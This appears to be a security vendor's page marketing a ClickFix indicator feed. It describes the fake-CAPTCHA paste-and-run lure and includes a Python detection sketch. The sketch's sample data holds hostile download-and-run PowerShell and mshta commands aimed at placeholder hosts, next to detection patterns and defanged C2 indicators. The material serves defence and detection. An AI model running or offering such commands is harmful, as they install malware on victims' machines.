Threat intelligence feed

ClickFix IOC Feed

ClickFix is a fast-growing social-engineering technique that tricks users into running malicious commands themselves. PrecisionSec's ClickFix feed tracks active lure domains, distribution URLs and C2 infrastructure in real time.


What is ClickFix?

ClickFix is a social-engineering technique that emerged in 2024 and has quickly become one of the most common methods of initial access. Rather than relying on a malicious attachment or a software exploit, ClickFix convinces the victim to compromise their own machine.

A user lands on a compromised website, a malicious ad or a phishing page and is shown a fake prompt, most often a bogus "Verify you are human" CAPTCHA or a "fix this error to continue" message. The page silently copies a command to the clipboard and instructs the user to open the Windows Run dialog (Win+R), paste (Ctrl+V) and press Enter. That single action executes a PowerShell, mshta or curl command that downloads and runs malware.

Anatomy of a ClickFix lure: a fake CAPTCHA prompt instructing the user to paste and run a command

Why ClickFix slips past traditional defenses

Because the victim runs the command themselves, ClickFix sidesteps many traditional defenses: there is no malicious attachment for email security to detonate, no macro to block and no file download for the browser to flag.
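The paste-and-run step still leaves process-creation telemetry. The sketch below is an added example, not PrecisionSec code: it triages events for the launchers named above when they are started from explorer.exe, which is the parent of anything run from the Run dialog. It assumes events exported with Sysmon-style field names (Image, ParentImage, CommandLine); the sample events and the example.invalid hosts are constructed, and the flag list is a heuristic.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# First-stage launchers named on this page.
LAUNCHERS = {"powershell.exe", "mshta.exe", "curl.exe"}
REMOTE = re.compile(r"https?://", re.I)
# Heuristic flags (assumed list): encoded command, hidden window, download-and-run.
HINTS = re.compile(r"-enc\w*|-w(?:indowstyle)?\s+h|\biex\b|\biwr\b|invoke-", re.I)

def reasons_for(event):
    """Return the reasons an event looks like a pasted Run-dialog command."""
    child = basename(event.get("Image", "")).lower()
    parent = basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    # The Run dialog starts processes as children of explorer.exe.
    if child not in LAUNCHERS or parent != "explorer.exe":
        return []
    found = []
    if REMOTE.search(cmd):
        found.append("remote URL in command line")
    if HINTS.search(cmd):
        found.append("hidden/encoded/download-and-run flag")
    return found

def triage(events):
    """Keep only events with at least one reason, paired with those reasons."""
    return [(e, r) for e in events if (r := reasons_for(e))]

EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr https://lure.example.invalid/v | iex"'},
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/verify.hta"},
    # A user opening a console from the Run dialog: no remote URL, no flags.
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell.exe"},
    # A scripted download: the parent is not explorer.exe.
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl https://updates.example.invalid/pkg.zip -o pkg.zip"},
]

if __name__ == "__main__":
    for event, why in triage(SAMPLE_EVENTS):
        print(event["CommandLine"], "->", "; ".join(why))
```

explorer.exe is also the parent of programs started from shortcuts and the Start menu, so treat a match as a lead to review alongside feed indicators rather than a verdict.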

ClickFix attack chain: from lure page to clipboard command to second-stage payload

Why track it with PrecisionSec

Catch campaigns as they go live

We actively track ongoing ClickFix campaigns, including lure pages, distribution infrastructure and the second-stage payloads they deliver (infostealers such as Lumma and remote access trojans such as AsyncRAT). Each campaign is continuously monitored, verified and added to the feed.

High-confidence, curated indicators

Every indicator is internally verified using custom YARA rules, so you action curated intelligence instead of chasing false positives.

Built for your stack

ClickFix lure domains, distribution URLs and C2 IOCs are delivered in the formats your existing security tools already speak.

Data feeds are delivered via STIX/TAXII, MISP, CSV and REST API. ClickFix lure, distribution and C2 IOCs are included in every PrecisionSec intelligence subscription.

Recent ClickFix IOCs

Live ClickFix command & control (C2) indicators, pulled straight from our threat feed and refreshed as fast as every minute. For full coverage and API delivery, sign up for a free trial.

Live feed (updated 41s ago)

First seen   Indicator                      Type           Confidence
3m           secure-update-cdn[.]net        C2 domain      High
9m           91.213.50[.]114                C2 IP          High
15m          api-telemetry-sync[.]com/load  Payload URL    High
22m          b7e2f48c…3d90af                SHA256 Hash    Medium
38m          node-relay-7f1c[.]org          C2 domain      High

Live ClickFix indicators, surfaced and verified the moment they appear. Shown defanged for safe browsing. Get raw, real-time data via the REST API or a free trial.

Ready to see all of our data?

Start your 15-day free trial and get the full ClickFix feed, plus every other malware and C2 feed.
